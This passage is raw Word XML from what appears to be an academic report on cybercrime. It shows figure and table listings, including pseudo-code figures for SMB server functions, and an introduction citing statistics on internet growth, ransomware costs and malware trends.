            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>109</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D46F64D" w14:textId="6B3D0C19"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57" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 132: Function Pseudo Code Srv0s2FeaListToNT [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981857 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>124</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5663CBA0" w14:textId="202D0C80"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58" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 133: Function Pseudo Code for Srv0s2FeaListSize ToNT [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981858 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>125</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D87A971" w14:textId="2C86B90D"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59" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 134: Srv0s2FeaToNT [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981859 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>125</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="687C389A" w14:textId="135AD7AE" w:rsidR="008D7F6F"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1981860" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 135: Pseudo Code for SMB BlockingSessionSetupAndx Function [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981860 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>126</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="162E7496" w14:textId="00946303" w:rsidR="00CA2734" w:rsidRDefault="008D7F6F" w:rsidP="00CA2734">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46902F1F" w14:textId="798FEC4F" w:rsidR="00CF2D57" w:rsidRDefault="00CF2D57" w:rsidP="00CA2734">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc113190689"/>
      <w:r>
        <w:t xml:space="preserve">LIST OF </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="0060608D">
        <w:t>TABLES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="0060608D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65AA6A" w14:textId="66B1A2F8" w:rsidR="00CA2734" w:rsidRDefault="00CA2734">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc111363896" w:history="1">
        <w:r w:rsidRPr="009463FA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 1: Risks and Mitigation Techniques</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111363896 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21698D5C" w14:textId="164783E5" w:rsidR="00CA2734" w:rsidRPr="00CA2734" w:rsidRDefault="00CA2734" w:rsidP="00CA2734">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF799BE" w14:textId="173BB8AB" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00D03F10">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249F22F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc113190690"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FC6">
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="59DCB1B1" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc113190691"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The Internet and Cybercrime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0299AB1F" w14:textId="2FC72120" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In January 2012, only 11.7% of the world population used the Internet. </w:t>
      </w:r>
      <w:r w:rsidR="00E54AFE">
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2022 the world’s population was 7.91 billion and 4.95 billion people used the internet, a total of 62.5%</w:t>
      </w:r>
      <w:r w:rsidR="00785147">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-74523819"/>
          <w:placeholder>
            <w:docPart w:val="5E8209F0A4E64F608BE4C52D1B5B2B09"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. Figure 1 illustrates the growth of internet users over the last 10 years.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C46733E" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44502EBF" wp14:editId="531E32D2">
            <wp:extent cx="6127604" cy="3448050"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="19050"/>
            <wp:docPr id="6" name="Picture 6" descr="Global Internet Users Over Time January 2022 DataRepor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obal Internet Users Over Time January 2022 DataReporta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34461" cy="3451908"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1">
                          <a:lumMod val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFE719" w14:textId="2132EA67" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc111363565"/>
      <w:bookmarkStart w:id="7" w:name="_Toc111363702"/>
      <w:bookmarkStart w:id="8" w:name="_Toc111981726"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Internet Users from 2012 to 2022 </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="483436607"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7E115ED4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6FE66B" w14:textId="1D86FF64" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the increase in the use of digital technology and the Internet in particular, criminals are turning to cybercrime. According to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1368173277"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is a lack of clarity as to what constitutes cybercrime. This report will use on the two definitions as set out by </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="922459463"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: cyber dependent crimes where Information and Communications Technology (ICT) is used to commit crimes such as transmitting malware for financial gain and hacking with the intention of damaging, destroying, or stealing data. Unauthorized access to network systems with the intention of disrupting, disabling, downgrading functionality eg. Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE79D5F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2 sets out the percentage of organisations that have been compromised by at least one successful attack on companies between 2014 and 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CFAC9" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48908F89" wp14:editId="6CDF4E2A">
            <wp:extent cx="4866640" cy="3438525"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="28575"/>
            <wp:docPr id="7" name="Picture 7" descr="Cyber Edge threat report - organizations-compromis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yber Edge threat report - organizations-compromised"/>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1466" t="-1" r="15245" b="14195"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4869262" cy="3440378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="4472C4">
                          <a:lumMod val="50000"/>
                        </a:srgb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97DD07A" w14:textId="03DE8CDB" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc111363566"/>
      <w:bookmarkStart w:id="10" w:name="_Toc111363703"/>
      <w:bookmarkStart w:id="11" w:name="_Toc111981727"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Percentage of organisations compromised by at least one successful attack</w:t>
      </w:r>
      <w:r w:rsidR="00440CB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1713764189"/>
          <w:placeholder>
            <w:docPart w:val="2D43A7A42F0F46D38176B46BFDEC3D2D"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7AB3C1E4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D224568" w14:textId="4B1B93A5" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first ransomware was in 1989 </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1097130443"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. By 2021, the United States’ ransomware attacks cost approximately $623.7 million </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1106321225"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[1], [6]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="425086644"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> state that 14.46 million ransomware attacks were thwarted in the first quarter of 2021 alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD911C" w14:textId="21E6B25C" w:rsidR="00DF42B8" w:rsidRDefault="00000000" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1565793468"/>
          <w:placeholder>
            <w:docPart w:val="13AF5044F8CA46BE887C695480ED10BC"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DF42B8">
        <w:t xml:space="preserve"> suggests that infection vectors such as malicious documents are increasing and that 38% used Microsoft Office formats ie. Word, Excel etc. Archive files ie .zip represent 37% and the use of PDF files were 14%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174488FC" w14:textId="2D6DD8C9" w:rsidR="00DF42B8" w:rsidRPr="00461785" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fileless attacks are starting to become more prevalent and increasing in sophistication and are thereby more effective at evading detection and in 2018 were present in 77% of successful compromises </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1937502633"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[1], [9]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B21B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B47ECA9" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Another target rich area is the Transport Layer Security (TLS) or Secure Sockets Layer (SSL) attacks and in a global survey by Gartner 35% of companies had been targeted in this manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514EE350" w14:textId="51ACFD63" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Between March 2021 and February 2022 there were 153 million new malware samples </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-2110954983"/>
          <w:placeholder>
            <w:docPart w:val="72A9045DA3DF43B29FB200131625196B"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Figure 3 illustrates the growth of total malware between 2013 and 2022. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A735EAF" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC68177" wp14:editId="536194C3">
            <wp:extent cx="5731510" cy="4250055"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="17145"/>
            <wp:docPr id="8" name="Picture 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a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
